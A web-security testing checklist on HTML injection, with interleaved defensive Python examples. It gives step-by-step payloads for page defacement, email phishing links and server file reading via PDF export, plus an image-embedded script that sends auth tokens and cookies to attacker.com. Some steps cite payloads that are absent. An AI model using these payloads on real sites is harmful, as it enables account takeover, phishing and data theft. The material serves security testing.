HTML Injection

Check List

Methodology

Black Box

Stored

1

Go to any page that has a user-editable rich text field (ticket or description, comment, bio)

2

Enter normal text like test <b>bold</b> test and submit

3

View the saved content as another user or in a private window; if bold renders as bold text, limited HTML is allowed

4

Intercept the save/create request with Burp Suite and send to Repeater

5

Locate the parameter that contains the user input and replace its value with this breakout + overlay payload

"><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div>
6

If the input is already inside a tag (for example wrapped in <p>), use this version

</p><div style="position:fixed;top:0;left:0;right:0;bottom:0;background:rgba(0,0,0,1);z-index:2147483647;"></div><p>
7

Send the request and let the content be saved

8

Log in as a different user or open an incognito/private window and visit any page that displays the saved content (dashboard, ticket list, profile page, forum thread)

9

If the entire screen becomes completely black and nothing is clickable, full visual defacement via Stored HTML Injection with the style attribute is confirmed

10

Works on every platform that uses allowlist-based HTML sanitization but still permits the style attribute on allowed tags such as <div>, <h1>, <b>, <i>, <a>
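As an added illustration (not code from the original page) of why the overlay payload survives, the following stdlib-only allowlist sanitizer is run in two hypothetical configurations: "weak" keeps the style attribute on allowed tags, "hardened" drops it. The has_overlay check is a quick way to scan stored content for the fixed-position/high z-index fingerprint of a defacement overlay. Tag and attribute lists are assumptions, not any real sanitizer's defaults.

```python
# Added example, not from the original page: a minimal allowlist HTML
# sanitizer built on html.parser, run with and without the style attribute.
from html.parser import HTMLParser
from html import escape
import re

ALLOWED_TAGS = {"b", "i", "a", "div", "h1", "p"}
# Hypothetical attribute allowlists for the two configurations.
WEAK_ATTRS = {"a": {"href"}, "div": {"style"}, "h1": {"style"},
              "b": {"style"}, "i": {"style"}, "p": set()}
HARDENED_ATTRS = {"a": {"href"}, "div": set(), "h1": set(),
                  "b": set(), "i": set(), "p": set()}

# CSS that lets an element cover the whole page: the overlay fingerprint.
OVERLAY_CSS = re.compile(r"position\s*:\s*(fixed|absolute)|z-index\s*:\s*\d{5,}", re.I)


class AllowlistSanitizer(HTMLParser):
    def __init__(self, attrs_allowed):
        super().__init__(convert_charrefs=True)
        self.attrs_allowed = attrs_allowed
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return  # unknown tags are dropped; their text content is kept
        kept = []
        for name, value in attrs:
            if name in self.attrs_allowed.get(tag, set()) and value is not None:
                if name == "href" and not value.lower().startswith(("http://", "https://", "/")):
                    continue  # no javascript: / data: links
                kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))


def sanitize(html, attrs_allowed):
    p = AllowlistSanitizer(attrs_allowed)
    p.feed(html)
    p.close()
    return "".join(p.out)


def has_overlay(html):
    """True if any surviving style attribute can pin an element over the page."""
    return any(OVERLAY_CSS.search(v) for v in re.findall(r'style="([^"]*)"', html, re.I))


# The breakout + overlay payload from the steps above.
PAYLOAD = ('"><div style="position:fixed;top:0;left:0;right:0;bottom:0;'
           'background:rgba(0,0,0,1);z-index:2147483647;"></div>')

if __name__ == "__main__":
    weak = sanitize("hello " + PAYLOAD, WEAK_ATTRS)
    hard = sanitize("hello " + PAYLOAD, HARDENED_ATTRS)
    print("weak    :", weak, "-> overlay:", has_overlay(weak))
    print("hardened:", hard, "-> overlay:", has_overlay(hard))
```

The weak configuration emits the <div> with its style intact, which is exactly what renders as a full-page black overlay; the hardened one keeps the <div> but strips the attribute, so nothing can be positioned over the page.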


Email HTML Injection

1

Go to any property valuation, booking request, or contact form that sends user input to an email template

2

Fill the form normally (especially the address or street and city fields) and intercept the POST request with Burp Suite

3

Send the request to Repeater

4

In the JSON body, locate the address-related fields (commonly street, formattedAddress, address, location, city)

5

Replace the street or formattedAddress value with your attacker-controlled URL, for example

"street": "https://attacker.com",
"formattedAddress": "https://attacker.com"
6

Full example payload (works on any similar endpoint)

{
  "address": {
    "street": "https://attacker.com",
    "formattedAddress": "https://attacker.com",
    "city": "Click here for your free valuation",
    "postalCode": "https://attacker.com"
  },
  "email": "victim@company.com",
  "name": "Please click the link below"
}
7

Send the request; it will succeed (no 403) if the field is not validated

8

Wait for the confirmation or booking email to be sent to the admin/agent/staff

9

When the victim (employee) opens the email, the address field will be rendered as a clickable link pointing to https://attacker.com

10

If the victim clicks it, Email Template Content Spoofing (phishing via a trusted domain) is confirmed


Email Invite Manipulation

1

Log in to your account on target.com

2

Navigate to your project settings page

3

Change your project name to a payload such as

<img src="https://miro.app.com/v2/resize:fit:720/format:webp/0*y2OAF_DSarBAjihO.jpg">
4

Go to the Invite Members section and send an email invitation to any email address you control

5

Open the received email

6

The HTML image is rendered inline in the email body, proving that the project name is inserted into the email template without encoding
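Both email sections above (address fields in a valuation form, project name in an invite) come down to user-supplied strings being dropped into an HTML email template verbatim. The following added example (not code from the original page; the template, field names and sample values are constructed) renders a hypothetical template the weak way and the hardened way, and additionally rejects address fields that carry a URL, since HTML-encoding alone does not stop a mail client from auto-linking a bare https:// address.

```python
# Added example, not from the original page: email template rendering
# without encoding (vulnerable) beside the encoded version, plus a check
# that refuses URL-looking values in address fields.
from html import escape
from string import Template
import re

# Hypothetical email template; the real one is not on the page.
TEMPLATE = Template(
    "<p>New valuation request from $name</p>"
    "<p>Address: $street, $city</p>"
    "<p>Project: $project</p>"
)

# Bare URLs, www. hosts, or the start of a tag.
URL_LIKE = re.compile(r"(?i)\b(?:https?|ftp)://|\bwww\.|<[a-z!/]")


def render_weak(fields):
    # Raw substitution: any HTML or URL in the fields reaches the mail client.
    return TEMPLATE.substitute(fields)


def render_hardened(fields):
    # Every field is HTML-encoded, so <img ...> arrives as inert text.
    return TEMPLATE.substitute({k: escape(v, quote=True) for k, v in fields.items()})


def address_problems(fields):
    """Return the address-type fields whose value looks like a URL or markup."""
    return sorted(k for k in ("street", "city", "formattedAddress", "postalCode")
                  if k in fields and URL_LIKE.search(fields[k]))


# Constructed input mirroring the payloads from the two sections above.
SAMPLE = {
    "name": "Please click the link below",
    "street": "https://attacker.com",
    "city": "Click here for your free valuation",
    "project": '<img src="https://attacker.example/pixel.png">',
}

if __name__ == "__main__":
    print(render_weak(SAMPLE))
    print(render_hardened(SAMPLE))
    print("reject fields:", address_problems(SAMPLE))
```

Note that address_problems flags street but not city: "Click here for your free valuation" is plain text that encoding renders harmless, whereas the URL in street would still be turned into a clickable link by most mail clients even after encoding, so it has to be rejected at validation time rather than encoded.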


Account Takeover

1

Go to your profile/shop bio or any field that allows limited HTML

2

Enter this exact HTML structure and save it

<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/your_image_id?options[delivery_type]=upload">Next page →</a>
</div>
</div>
3

Upload any valid image to the site (via avatar, product image, shop banner, anywhere that uses Cloudinary)

4

After upload, grab the image ID from the final URL (it usually looks like s--AbCdEfGh--/v1234567890/image_name.jpg, so your_image_id = s--AbCdEfGh--)

5

Replace your_image_id in the href above with your real Cloudinary image ID

6

Use a hex editor (https://hexed.it or local tool) to open your original image file

7

Go to offset 0x1A (or any safe location after the JPEG headers) and insert your XSS payload exactly like this (note that inserting raw bytes inside an existing header segment can break that segment's length field, so verify the file still opens)

<script>fetch('https://attacker.com/steal?token='+localStorage.getItem('auth_token')+'&cookie='+document.cookie)</script>
8

Save the modified image as new file (still valid JPEG)

9

Update your bio HTML with the new image ID and the exact parameter options[delivery_type]=upload

10

Final working bio payload

<div class="remote-pagination-container">
<div class="pagination">
<a href="/cloudinary/images/s--NewMaliciousID--/?options[delivery_type]=upload">Next →</a>
</div>
</div>
11

Save the bio, then visit your shop page as a victim would, or wait for anyone to view your shop/profile

12

When they click the "Next page →" link, jQuery replaceWith() loads your raw image bytes via same-origin, your embedded script executes, and the localStorage token + cookies are stolen: Account Takeover achieved


Send Message Functionality HTML Injection to Server Side Request Forgery

1

Log into the target site and find any feature that sends a message to another user or sends an email (Send Message functionality or an Email Form)

2

Enter a normal email like test@example.com and submit the form

3

Intercept the POST request with Burp Suite and send to Repeater

4

In the email parameter, replace the value with this exact payload

5

Send the request and check whether the alert pops or the script renders

6

If there is no alert but the field accepts input without an @ symbol, try a basic HTML breakout

7

Send, then refresh the page or view it as another user; if Hello renders, HTML Injection is confirmed. Then escalate with an external image load

8

If the image is fetched from the third-party host, there is SSRF potential (only if the request originates from the server, not from the viewer's mail client or browser)

9

Then use Burp Collaborator to capture the source IP of the fetch

10

Submit and check Burp Collaborator for HTTP/DNS interactions. A callback from the target's own infrastructure confirms SSRF; a callback from the recipient's mail client or browser is a viewer IP leak instead

11

Test the email parameter on other input endpoints (/contact, /feedback, /reset, /signup, /profile) as they often reflect input without @ validation
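Steps 8 to 10 above hinge on who actually fetched the image. The following added example (not code from the original page) triages Collaborator-style interaction records; the log lines, the target's address ranges and the mail provider's ranges are all constructed, and the real Collaborator export format is not on the page. It attributes each callback to the target's own infrastructure (server-side fetch, i.e. SSRF), to a mail provider's image proxy (nothing useful leaked), or to the recipient's client (viewer IP leak).

```python
# Added example, not from the original page: classify out-of-band callbacks
# from an injected <img> by source address, to separate SSRF from IP leaks.
import ipaddress
from collections import Counter

# Hypothetical ranges: what the target owns and what its mail provider uses.
TARGET_RANGES = [ipaddress.ip_network(n) for n in ("203.0.113.0/24", "2001:db8:10::/48")]
MAIL_PROVIDER_RANGES = [ipaddress.ip_network(n) for n in ("198.51.100.0/24",)]

# Constructed interaction log: "<type> <source ip> <user-agent or ->"
LOG = """\
DNS 203.0.113.7 -
HTTP 203.0.113.7 python-requests/2.31
HTTP 198.51.100.23 Mozilla/5.0 (compatible; ImageProxy)
HTTP 192.0.2.44 Mozilla/5.0 (Windows NT 10.0) Outlook
"""


def classify(ip, user_agent):
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in TARGET_RANGES):
        return "ssrf"            # fetched by the target itself
    if any(addr in net for net in MAIL_PROVIDER_RANGES) or "proxy" in user_agent.lower():
        return "mail-proxy"      # provider-side prefetch, leaks nothing useful
    return "viewer-ip-leak"      # the recipient's client opened the image


def triage(log):
    """Return (Counter of verdicts, list of (type, ip, verdict)) for a log."""
    verdicts = []
    for line in log.strip().splitlines():
        kind, ip, ua = line.split(" ", 2)
        verdicts.append((kind, ip, classify(ip, ua)))
    return Counter(v for _, _, v in verdicts), verdicts


if __name__ == "__main__":
    counts, verdicts = triage(LOG)
    for kind, ip, verdict in verdicts:
        print(f"{kind:4} {ip:16} -> {verdict}")
    print(dict(counts))
```

Only the first two lines would support an SSRF finding; the Outlook line is a client-side leak of the reader's address, which is a different (and lower) severity and should be reported as such.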


Server File Reading via PDF Export

1

Go to any feature that takes a user-supplied filename and supports PDF export (reports, invoices, profiles, documents, attachments)

2

Upload a normal file with a safe name like test.pdf

3

Trigger PDF generation, download the file and open it to confirm the filename appears inside

4

Intercept the upload POST request with Burp Suite and send to Repeater

5

In the filename parameter, replace the value with this HTML breakout payload

6

Send the request and generate a new PDF

7

Open the PDF; if <h1>XSS Test</h1> renders as large heading text, HTML Injection into the PDF template is confirmed

8

Then escalate with this JavaScript LFI payload (works in wkhtmltopdf, headless Chrome PDF rendering, etc.)

9

Or for Windows servers

10

Generate the PDF again and open it. If the /etc/passwd or system.ini contents are printed inside the PDF, critical Local File Inclusion (LFI) via PDF HTML Injection is confirmed

11

Then read other sensitive files

  • file:///etc/hosts

  • file:///proc/version

  • file:///var/www/html/config.php
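The export flow above can be closed off at two points: encode the filename before it enters the template, and refuse to hand the renderer any HTML that references local files, external hosts, scripts or frames. The following is an added example (not code from the original page); the invoice template, the allowed asset host and the sample hostile filename are constructed. The --disable-local-file-access and --disable-javascript flags are real wkhtmltopdf options.

```python
# Added example, not from the original page: encode the filename and scan
# the assembled HTML before a PDF engine renders it.
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"cdn.example.test"}  # hypothetical asset host
URL_ATTRS = {"src", "href", "data", "action", "xlink:href"}
BANNED_TAGS = {"script", "iframe", "object", "embed", "link", "meta", "base", "form"}


class RenderGuard(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in BANNED_TAGS:
            self.findings.append(f"tag <{tag}> not allowed")
        for name, value in attrs:
            if name in URL_ATTRS and value:
                self.check_url(tag, name, value)
            if name.startswith("on"):
                self.findings.append(f"event handler {name} on <{tag}>")

    def check_url(self, tag, name, value):
        parts = urlsplit(value.strip())
        scheme = parts.scheme.lower()
        if scheme in ("file", "javascript", "data", "jar", "php"):
            self.findings.append(f"{scheme}: URL in <{tag} {name}>")
        elif scheme and parts.hostname not in ALLOWED_HOSTS:
            self.findings.append(f"external host {parts.hostname} in <{tag} {name}>")


def build_invoice_html(filename):
    # Hypothetical template; the encoded filename cannot break out of the <td>.
    return (f"<table><tr><td>Attachment</td>"
            f"<td>{escape(filename, quote=True)}</td></tr></table>")


def guard(html):
    """Return the list of findings; an empty list means the HTML may be rendered."""
    g = RenderGuard()
    g.feed(html)
    g.close()
    return g.findings


# Renderer invocation with local file access and JavaScript disabled.
WKHTMLTOPDF_CMD = ["wkhtmltopdf", "--disable-local-file-access",
                   "--disable-javascript", "in.html", "out.pdf"]

# Constructed hostile filename in the shape of the breakout from step 5.
HOSTILE_NAME = '</td><h1>XSS Test</h1><iframe src="file:///etc/passwd"></iframe><td>'

if __name__ == "__main__":
    safe_html = build_invoice_html(HOSTILE_NAME)
    print(safe_html, guard(safe_html))
    print(guard('<img src="file:///etc/passwd"><script>x</script>'))
```

The guard is a second line of defence only: the encoding in build_invoice_html is what actually prevents the breakout, and disabling local file access in the renderer is what makes a file:/// reference harmless even if both of those are bypassed.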


White Box

Cheat Sheet
